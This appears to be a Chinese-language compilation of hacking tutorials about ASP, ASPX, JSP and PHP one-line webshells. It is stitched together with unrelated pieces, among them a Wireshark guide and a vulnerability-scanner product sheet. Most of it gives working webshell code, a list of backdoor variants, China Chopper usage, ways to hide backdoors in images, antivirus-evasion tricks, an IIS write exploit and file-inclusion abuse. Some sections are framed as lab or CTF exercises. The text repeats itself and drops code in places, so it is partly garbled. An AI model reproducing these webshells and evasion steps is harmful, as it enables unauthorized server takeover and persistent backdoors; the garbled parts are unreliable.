asp一句话木马入侵网站实战

asp一句话木马入侵网站实战
asp一句话木马入侵网站实战

asp一句话木马网站入侵实战成功

今天给大家讲述的是asp一句话木马网站入侵实战。实验环境是在实验室模拟老师的电脑入侵自己的asp网站成功,时间201210月13号,地点实验室。入侵目标是将此网站主页标题中“云计算中心”变更成“一句话木马入侵实战成功”,接下来就由我在此抛砖引玉的开头吧,

在讲述本次入侵的开头,我还是按照惯例给他家补充一下知识,为了是大家跟好的理解这次asp一句话木马网站入侵实战。给大家补充几个知识点:

第一什么是一句话木马

黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:<%execute request("value")%>

<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)

当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)

这就被称为一句话木马,它是基于B/S结构的

第二就是漏洞

苍蝇不盯无缝的蛋,入侵者只要找到复杂的计算机网络中的一个缝,就能轻而易举地闯入系统。所以,了解这些缝都有可能在哪里,对于修补它们至关重要。通常,裂缝主要表现在软件编写存在bug、系统配置不当、口令失窃、明文通讯信息被监听以及初始设计存在缺陷等方面。漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说,比如在Intel Pentium芯片中存在的逻辑错误,在Sendmail早期版本中的编程错误,在NFS 协议中认证方式上的弱点,在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用,威胁到系统的安全。因而这些都可以认为是系统中存在的安全漏洞第三就是本次实验就是建立在已知网站的数据库的路径下,且以asp格式保存下这个为漏洞。

第四就是本实验逻辑步骤分为三步,分别是向目标网站植入一句话小木马,在客户端建立连接,客户端上传一句话大木马到服务器,在客户端打开上传的一句话大木马获得网站的WEBshell。

现在我就代领大家进入asp一句话木马网站入侵实战。精彩节目开始

第五部分开始入侵实战

1. 简述目标网站植入一句话小木马

首先进入目标网站的注册页面截图如下

网站主页

点击会员注册进去注册页面

在用户名和密码的文本框中输入一句话小木马的asp源代码

<%execute request("cnnsc")%>截图如下

点击提交这样一句话小木马就提交到了网站的数据库

弹出此窗口显示提交成功

2.打开建立客户端与目标网站服务器端的连接页面截图如下

在此页面服务器地址文本框,密码框,下面的文本框中分别输入,刚才提交的一句话小木马的提交地址,密码,大木马的源代码,此处特别提醒的是小木马的密码在本实验中是cnnsc输入上述三项值的文本截图如下

点击提交按钮即可将大木马上传到网站服务器中

木马上传成功截图如上

3.输入大木马密码进入目标网站获取WEBSHELL

如上图点击登录即可进入网站服务器,呵呵到此已经成功了,截图如下

用于非法攻击。

中国菜刀使用教程

想学学怎么用菜刀,刚在网上搜到了菜刀的使用方法。怕有和我一样的新手不会用,所以发过来,算是给大家分享吧。首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。 asp的一句话是:<%eval request("pass")%> aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> php的一句话是: 这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp 的一句话的密码改成wc,那么改完之后就是这样的: <%eval request("wc")%> 其他同理。 要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。 当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。 插入了一句话木马,下面就是连接了。 在菜刀主界面,右击,选择“添加”, 在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填, 填完之后单击“添加”,就可以了。 添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了 在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能 如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

一句话木马图片制作(三种方法)

图片木马制作的三种方法Copy命令制作 1.asp内容: 打开cmd,数据一下命令:

此时打开两个jpg文件,相比: 且打开可以像一样显示图像。 把以下代码放入目标网站,即可按asp执行。<% #include files=””%> Uedit32(转载):

本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配: 'execute' /news1/,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:

2.一句话木马服务器端代码: <%execute request("value")%>(其他的一句话也行) 3.一句Script标签: 4. 调用图片后门代码: 工具:UltraEdit

01-Wireshark教程和3个实例

Wireshark教程 一、界面 二、认识数据包 网络的7层次结构:物理层、数据链路层、网络层、传输层、表示层、会话层、应用层物理层数据帧概况: 数据链路层以太网帧头部信息 MAC地址:是网卡的物理地址 前3组是表示生产厂家、后3组是厂家对网卡的编号 IP地址是我们定义的,可以随便更改 ARP协议就是用来对二者进行转换的

互联网层IP包头部信息 其它内容 三、过滤器设置 过滤器的区别 捕捉过滤器(CaptureFilters):用于决定将什么样的信息记录在捕捉结果中。需要在开始捕捉前设置。显示过滤器(DisplayFilters):在捕捉结果中进行详细查找。他们可以在得到捕捉结果后随意修改。 那么我应该使用哪一种过滤器呢? 两种过滤器的目的是不同的。

捕捉过滤器是数据经过的第一层过滤器,它用于控制捕捉数据的数量,以避免产生过大的日志文件。 显示过滤器是一种更为强大(复杂)的过滤器。它允许您在日志文件中迅速准确地找到所需要的记录。 两种过滤器使用的语法是完全不同的。 显示过滤器 snmp || dns || icmp//显示SNMP或DNS或ICMP封包。 ip.addr == 10.1.1.1//显示来源或目的IP地址为10.1.1.1的封包。 ip.src==172.16.1.102 //显示来源是172.16.1.102的数据包 ip.src != 10.1.2.3 or ip.dst != 10.4.5.6//显示来源不为10.1.2.3或者目的不为10.4.5.6的封包。 ip.src != 10.1.2.3 and ip.dst != 10.4.5.6 //显示来源不为10.1.2.3并且目的IP不为10.4.5.6的封包。 tcp.port == 25//显示来源或目的TCP端口号为25的封包。 tcp.dstport == 25//显示目的TCP端口号为25的封包。 tcp.flags//显示包含TCP标志的封包。 tcp.flags.syn == 0x02//显示包含TCP SYN标志的封包。 可以从上面看过滤器设置的规则 通过这里的背景可以判断使用的语法是否正确:红色背景表示语法错误,绿色背景表示正确并且可以运行,黄色背景表示语法正确,但是可能没有结果。 1、使用字段名来过滤 在过滤器中输入:http.request.method==”GET” ,将显示使用GET方法获取数据的所有包

题目11:IIS write漏洞利用

关卡十一 题目:IIS Write漏洞利用 关卡描述: IIS写权限对网站系统的安全是致命的,拥有写权限可以直接往网站目录写文件,在拥有写权限的服务器上,其安全相对设置薄弱,因此比较容易被入侵者控制。写权限漏洞严格意义上讲其实不算是漏洞,因为网站内容始终是要进行编辑和修改的。只有对文件的权限分配不慎才会造成写权限被利用,进而被植入木马等情况的发生。 建议: 1、如果是纯静态页网站,请不要添加写入与删除功能,那么你的空间就是百毒不侵。 2、如果有写入权限,无修改与删除功能,那么你的网站也是非常安全的,就算有入侵它所有写入的文件都不能更改(留下足迹)而你网站本身的文件也是相当安全。唯一的是可能会写入很多垃圾文件。 3、如果有修改权限,那么与有删除权限其实是一样的。因为一个文件就算删除不了,我把内容清空那与删除这个文件是一样的效果。所以分配这些权限需要小心谨慎。 答案提交: 1、请提交获取的KEY值。 参考步骤:

1.进入关卡十一: 2.获取目标主机ip地址 3.打开工具场景windows xp

4.C:\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描 5.目标系统中搭建网站存在该漏洞,鼠标右击会看到浏览、上传、导出等选项 6.选择put file测试一下,默认有该软件作者写的一个alert.txt文件,点击put,提示上传成功.如图:

打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件,且内容和软件里的一致 但是直接通过该软件写个asp木马上传是不行的。

使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%> 在桌面先新建一个aa.txt文档,内容如下 然后通过使用iiswrite.exe上传文本文件。

L003001041-一句话木马测试分析

课程编写 别内容 题名称L003001041-一句话木马测试分析 与要求熟悉一句话木马的原理,掌握一句话木马的使用以及防御方法 (虚拟PC)操作系统类型:windows server 2003和windows XP professional,网络接口:本地连接连接要求PC 网络接口,本地连接与实验网络直连 描述中国菜刀 环境描述1、学生机与实验室网络直连; 2、VPC1与实验室网络直连; 3、学生机与VPC1物理链路连通; 知识 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request("value")%> 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值 <%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。 (不知道数据库也可以request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。) 这就被称为一句话木马,它是基于B/S结构的。 内容理解该漏洞的实现过程

步骤 学生登录实验场景的操作 1、学生单击“网络拓扑”进入实验场景,单击windows2003中的“打开控制台”按钮,进入目标 我们把windows2003机器作为服务机(ip地址为192.168.1.154,不固定) 2、学生输入账号Administrator ,密码123456,登录到实验场景中的Windows server 2003,在该网站,并且能够正常访问。如图所示:

asp一句话木马原理分析

asp一句话木马原理分析 通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现“编译错误,缺少脚本关闭标志%>” 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request(“a”)%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码<%execute request(“a”)%>可以这样来解释: <% if request(“a”)<>”“ then execute request(“a”) %> 如果a不为空的时候执行.执行什么呢?... if a != 0 下面我们来看一下客户端: <form action=http://192.168.0.28/shell.asp method=post> <textarea name=l cols=120 rows=10 width=45> set lP=server.CreateObject(“Adodb.Stream”) …创建Adodb.Stream组件.. lP.Open lP.Type=2 lP.CharSet=“gb2312” - 1 -

lP.writetext request(“p”) lP.SaveToFile server.mappath(“dbbak.asp”),2 lP.Close set lP=nothing response.redirect “dbbak.asp” </textarea> <textarea name=p cols=120 rows=10 width=45>要提交的数据</textarea><BR><center><br> <input type=submit value=提交> Adodb.Stream负责上传读取数据到服务器: 组件:”Adodb.Stream” 有下列方法: Cancel 方法 使用方法如下 Object.Cancel 说明:取消执行挂起的异步Execute 或Open 方法的调用。 WriteText 方法 使用方法如下: Object.Write(Data,[Options]) 说明:将指定的文本数据装入对像中。 参数说明:Data 为指定的要写入的内容。 Options 写入的选项,可不指定,可选参数如下: adWriteChar =0 adWriteLine =1 SaveToFile 方法 使用方法如下: Object.SaveToFile(FileName,[Options]) 说明:将对像的内容写到FileName指定的文件中 也就是我们保存木马的文件名dbbak.asp 参数说明:FileName指定的文件 - 2 -

一句话木马图片制作(三种方法)

图片木马制作的三种方法 Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 <% #include files=”2.jpg”%> Uedit32(转载): 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误错误'800a000d' 类型不匹配: 'execute' /news1/show.asp,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:1.jpg 2.一句话木马服务器端代码: <%execute request("value")%>(其他的一句话也行) 3.一句Script标签: 4. 调用图片后门代码: 工具:UltraEdit 二、开始制作: 1.使用UltraEdit打开1.jpg文件,然后按CTRL +F 进行查找图片中的“<%”和“%>” 其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;

一句话木马原理详解

一句话木马原理详解 eval(Request.form('#')+'') 来解释下它的原理. 首先是JavaScript脚本的开始标记,其中RUNA T属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name 值被命名为#的部分,例如如下摘自一句话客户端的代码: set iP=server.createObject("Adodb.Stream") iP.Open iP.Type=2 iP.CharSet="gb2312" iP.writetext request("aoyun") iP.SaveToFile server.mappath("aoyunwan.asp"),2 iP.Close set iP=nothing response.redirect "aoyunwan.asp" 学过html的朋友应该注意到了在textarea标记中的name属性被

赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了: set iP=server.createObject("Adodb.Stream") iP.Open iP.Type=2 iP.CharSet="gb2312" iP.writetext request("aoyun") iP.SaveToFile server.mappath("aoyunwan.asp"),2 iP.Close set iP=nothing response.redirect "aoyunwan.asp" 学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了! 不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件,因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件,如果该组件被禁用的话

ASPX一句话木马--终极版详细分析

首先回顾一下以前ASP一句话的经典木马吧! <%if request("nonamed")<>"" then execute request("nonamed")%> VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP 一句话木马也有个版本是采用JSCRIPT的eval的!网上也有例子我就不多说了!..... 然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了! 之前ASP中正常情况只支持VBS JSCRIPT(像python perlscript 这些特例的我就不说了)... 如今ASPX中所支持的VBS的高级版本VB已经不存在execute这个独有的方法....真遗憾.... 同时Jscript 也一样转向高级版本https://www.360docs.net/doc/e4530294.html, 但是我们需要的eval函数还是生存下来的!script child有幸了... 先埋下一个伏笔吧~ 先谈谈如今的中间语言WEB应用中的一句话 JSP :<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParame ter("t").getBytes()); %> 这个是我自己写的要弹要说,都是大家的呵呵!我不发言..... ASPX:<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close() %> 这个不知道是谁的作品,感觉性质有点像我的JSP一句话了!不过还是把简单的shell实现了!支持ing.... 两个一句话大体都一样调用类把接收的都写到文件!简单说就是对文件写操作而已!~昔日ASP 一句话的光辉如今在中间语言的后门中给限制得荡然无存~~错!......ASPX C/S木马我们一样可以实现!因为有https://www.360docs.net/doc/e4530294.html,的存在!上面所说到的eval函数还生存着!~ OK我们先来实现 <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["nonamed"]));%> 这样?恩!可以拿去尝试了~ 保存为text.aspx 然后提交 http://127.0.0.1/text.aspx?nonamed=var%20mydate%20=%20new%20Date(); 打印出当前时间...Sat Aug 4 20:05:20 UTC+8 2007 貌似OK了哦!呵呵我们再试 http://127.0.0.1/text.aspx?nonamed=Server.MapPath("."); 发现报告错误了!....(我就是因为卡在这里,所以折腾了几个月,不然这文章早出炉了!在这里感谢一下闇の術士QQ:4659675 欢迎大家找他学习...哈) 错误原因 { 安全性异常 说明: 应用程序试图执行安全策略不允许的操作。要授予此应用程序所需的权限,请与系统管理员联系,或在配置文件中更改该应用程序的信任级别。 异常详细信息: System.Security.SecurityException: 请求失败。 } 为什么会这样呢?OK我们找到MS文档 往下面看 https://www.360docs.net/doc/e4530294.html,/library/chs/default.asp?url=/library/CHS/jscript7/html/jsmscStartPage.asp JScript .NET JScript .NET 的新增功能 JScript .NET 是下一代的Microsoft JScript 语言,它是使用Web语言方便快捷地访问

绿盟--漏洞扫描系统NSFOCUS-RSAS-S-v5.0知识讲解

1.产品简介 每年都有数以千计的网络安全漏洞被发现和公布,加上攻击者手段的不断变化,网络安全状况也在随着安全漏洞的增加变得日益严峻。事实证明,99%的攻击事件都利用了未修补的漏洞,使得许多已经部署了防火墙、入侵检测系统和防病毒软件的企业仍然饱受漏洞攻击之苦,蒙受巨大的经济损失。 寻根溯源,绝大多数用户缺乏一套完整、有效的漏洞管理工作流程,未能落实定期评估与漏洞修补工作。只有比攻击者更早掌握自己网络安全漏洞并且做好预防工作,才能够有效地避免由于攻击所造成的损失。 绿盟远程安全评估系统(NSFOCUS Remote Security Assessment System,简称:NSFOCUS RSAS)第一时间主动诊断安全漏洞并提供专业防护建议,让攻击者无机可乘,是您身边的“漏洞管理专家”。 产品为国内开发,具备自主知识产权,并经过三年以上应用检验并提供产品用户使用报告的复印件;产品具有高度稳定性和可靠性。 产品取得了中华人民共和国公安部的《计算机信息系统安全专用产品销售许可证》,中华人民共和国国家版权局《计算机软件著作权登记证书》,中国人民解放军信息安全产品测评认证中心的《军用信息安全产品认证证书》,国家保密局涉密信息系统安全保密测评中心《涉密信息系统产品检测证书》,中国信息安全测评中心《信息技术产品安全测评证书--EAL3》,中国信息安全认证中心《中国国家信息安全产品认证证书》。 厂商在信息安全领域有丰富的经验与先进的技术,须有对系统漏洞进行发现、验证、以及提供应急服务的技术能力。

产品使用了专门的硬件,基于嵌入式安全操作系统,大大提高了系统的工作效率和自身安全性。系统稳定可靠,无需额外存储设备即可运行,系统采用B/S 设计架构,并采用SSL加密通信方式,用户可以通过浏览器远程方便的对产品进行管理。 产品要求界面友好,并有详尽的技术文档;产品支持中英文图形界面,能够方便的进行语言选择,能够提供丰富的中英文语言的文档资料。 通过CVE兼容性认证及英国西海岸实验室Checkmark认证等国际权威认证。 2.产品功能 2.1 系统漏洞扫描功能 1. 漏洞知识库从操作系统、服务、应用程序和漏洞严重程度多个视角进行分类, 需要给出具体的分类信息。 2. 支持对漏洞信息的检索功能,可以从其中快速检索到指定类别或者名称的漏 洞信息,并具体说明支持的检索方式。 3. 提供漏洞知识库中包含的主流操作系统、数据库、网络设备的列表信息。

一句话木马的原理及利用

一句话木马的原理及利用(asp,aspx,php,jsp) 一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为<%execute request("value")%> 其中value可以自己修改 "一句话木马"客户端(远程服务器上被插入一句话的asp文件) 用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件 现在先假设在远程主机的TEXT.ASP(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)



一句话木马的原理

一句话木马的原理 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码<%execute request("a")%>可以这样来解释: <% if request("a")<>"" then execute request("a") %> 如果a不为空的时候执行.执行什么呢?... if a != 0 下面我们来看一下客户端:


Adodb.Stream负责上传读取数据到服务器: 组件:"Adodb.Stream" 有下列方法: Cancel 方法 使用方法如下 Object.Cancel 说明:取消执行挂起的异步 Execute 或 Open 方法的调用。 WriteText 方法 使用方法如下: Object.Write(Data,[Options]) 说明:将指定的文本数据装入对像中。 参数说明:Data 为指定的要写入的内容。 Options 写入的选项,可不指定,可选参数如下: adWriteChar =0 adWriteLine =1 SaveToFile 方法 使用方法如下: Object.SaveToFile(FileName,[Options]) 说明:将对像的内容写到FileName指定的文件中 也就是我们保存木马的文件名dbbak.asp 参数说明:FileName指定的文件 Options 存取的选项,可不指定,可选参数如下: adSaveCreateNotExist =1 adSaveCreateOverWrite =2 提交一句话木马后,a的值为空等待一个写入的值访问 http://www.***.com/**.asp就是等待的过程如何准备用execute()这个函数

一句话木马

asp一句话木马 程序后门代码 <%eval request("sb")%> 程序代码 <%execute request("sb")%> 程序代码 <%execute(request("sb"))%> 程序代码 <%execute request("sb")%><%'<% loop <%:%> 程序后门代码 <%'<% loop <%:%><%execute request("sb")%> 程序后门代码 <%execute request("sb")'<% loop <%:%>[code] [code] 程序代码 %><%Eval(Request(chr(35)))%><% 程序代码 <%eval request("sb")%> 程序后门代码 <%ExecuteGlobal request("sb")%> 程序代码 if Request("sb")<>"" then ExecuteGlobal request("sb") end if //容错代码 程序代码 <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%> <% var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'}; lcx.性别((lcx.名字)+''); %> //使用冰狐一句话客户端链接 程序后门代码 <% Set o = Server.CreateObject("ScriptControl") https://www.360docs.net/doc/e4530294.html,nguage = "vbscript" o.addcode(Request("SubCode")) '参数SubCode作为过程代码 o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数 %> 调用示例: 程序代码 http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Ap plication,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20s ub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29

利用本地包含漏洞执行任意代码

1 概述 文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。 本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server会将特定文件当成php 执行,从而导致用户可获取一定的服务器权限。 2 利用LFI执行PHP代码 2.1本地包含漏洞实例展示: 演示脚本文件test.php代码如下: 在正常使用过程中,可能是这样子:https://www.360docs.net/doc/e4530294.html,/test.php?f=fuction,这样子就包含了function这个文件,但是由于file参数没有过滤,我们可以自己提交参数内容,这个时候就导致了包含漏洞的出现。比如提交: https://www.360docs.net/doc/e4530294.html,/index.php?f=shell.txt%00,shell.txt的内容为我们的webshell,由于前面的是index.php,所以会把shell.txt当成是木马执行。 在虚拟机搭建实例环境,

asp一句话木马入侵网站实战

asp一句话木马网站入侵实战成功 今天给大家讲述的是asp一句话木马网站入侵实战。实验环境是在实验室模拟老师的电脑入侵自己的asp网站成功,时间201210月13号,地点实验室。入侵目标是将此网站主页标题中“云计算中心”变更成“一句话木马入侵实战成功”,接下来就由我在此抛砖引玉的开头吧, 在讲述本次入侵的开头,我还是按照惯例给他家补充一下知识,为了是大家跟好的理解这次asp一句话木马网站入侵实战。给大家补充几个知识点: 第一什么是一句话木马 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:<%execute request("value")%> <%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用) 当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。) 这就被称为一句话木马,它是基于B/S结构的 第二就是漏洞 苍蝇不盯无缝的蛋,入侵者只要找到复杂的计算机网络中的一个缝,就能轻而易举地闯入系统。所以,了解这些缝都有可能在哪里,对于修补它们至关重要。通常,裂缝主要表现在软件编写存在bug、系统配置不当、口令失窃、明文通讯信息被监听以及初始设计存在缺陷等方面。漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说,比如在Intel Pentium芯片中存在的逻辑错误,在Sendmail早期版本中的编程错误,在NFS 协议中认证方式上的弱点,在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用,威胁到系统的安全。因而这些都可以认为是系统中存在的安全漏洞第三就是本次实验就是建立在已知网站的数据库的路径下,且以asp格式保存下这个为漏洞。 第四就是本实验逻辑步骤分为三步,分别是向目标网站植入一句话小木马,在客户端建立连接,客户端上传一句话大木马到服务器,在客户端打开上传的一句话大木马获得网站的WEBshell。 现在我就代领大家进入asp一句话木马网站入侵实战。精彩节目开始 第五部分开始入侵实战 1. 简述目标网站植入一句话小木马 首先进入目标网站的注册页面截图如下

一句话木马的免杀处理

在进一步入侵服务器时,上传的文件会被服务器过滤掉,我们上传的WEBSHLL就无法运行了! 以蓝屏最小ASP木马为例子!进行如下修改。 原来代码是<%execute request("cmd")%> 把标签修改替换下来为 <scriptlanguage=VBScript runat=server>execute request("cmd")</Script> 这样就避开了<%,%>符号! 表中数据段限制,一句话木马也写不下的情况 网络中流传的最小的木马代码是<%eval request("#")%> 如过连这也 写不下怎么办? 将木马分开写就好了! <%Y=request("x")%> <%execute(Y)%> 这样分开写提交到数据库就没问题了! 不过,在ACCESS数据库中新增加的数据物理位置是在旧数据之前的,所以要先写 <%execute(Y)%>部分。写好后在客户端写密码时除了填写"x"以外的任何字 符都可以,如果填了"x"就会出错! 插入一句话容易爆错 例如 Sub unlockPost() Dim id,replyid,rs,posttable id=Request("id") replyid=Request("replyid") If Not IsNumeric(id) or id="" Then 写成 Sub unlockPost(<%eval request("#")%>) Dim id,replyid,rs,posttable

相关文档
最新文档